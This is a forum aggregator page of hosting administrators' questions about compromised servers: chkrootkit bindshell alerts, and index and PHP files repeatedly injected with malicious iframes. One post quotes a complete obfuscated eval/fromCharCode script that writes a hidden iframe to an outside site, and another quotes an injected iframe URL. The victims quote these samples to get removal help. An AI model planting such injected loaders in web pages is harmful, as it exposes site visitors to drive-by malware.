Bindshell INFECTED

Jan 15, 2007

Quote:

Searching for rootedoor... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found

Above is a part of chkrootkit report i receive everyday,today seem something is wrong as bindshell is INFECTED.Any suggestion what should i do in this case?

View 5 Replies


ADVERTISEMENT

Checking `bindshell'... INFECTED (PORTS: 465)

Jul 29, 2007

I run CHKROOTKIT Scan and found that:

Checking `bindshell'... INFECTED (PORTS: 465)

View 2 Replies View Related

Bindshell Port Open 444

Oct 18, 2009

I got a msg from the server that a port 444 is open in my server, how could i know what the bindshell ports open in my server and how to close it please ?

Code:
Checking `bindshell'... INFECTED (PORTS: 444)
i use cpanel/csf firewall

View 10 Replies View Related

Infected Web Pages

Jun 10, 2009

150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.

View 8 Replies View Related

My Server Infected

Oct 26, 2007

seem that my server is infected by this virus Exploit.HTML.IESlice.h
it insert iframe code to index page and forward visitors to another site.

my server is running centos 4.5 and WHM/Cpanel, which antivirus software i need to use or other methods to eliminate this virus?

View 1 Replies View Related

All Index Files Got Infected

Jun 12, 2007

after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files

Code:
<iframe src=[url]

and when i delete this code it come again in all index files

i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again

View 14 Replies View Related

Websites Infected With Trojan How To Solve?

Nov 16, 2008

i see my websites are infected with some trojan.

there are some iframe tag simlilar to this in all index files

<iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe>
any idea how might this iframe inserted in my codes.

i have tried to format my systems and remove all saved ftp passwords , but still this virus is comming back and the strange thing is i have website on different servers infected with same virus
any idea how this is happened and how to avoide this?

View 9 Replies View Related

Index Files Got Infected " "

Mar 12, 2008

i have amny server , and i got about 7 server got infected

2 weeks ago i got some sites have avirs i delted the code which got added on some index.html & index.php " any index files "

i removed the code and cleaned the servers,

after 2 hrs i saw it back again.

i made scan and i got them back, i replaced the pages with cleaned pages, and removed it again.

but till now it came back after i remove.

how can i protict my server from this issus

View 3 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved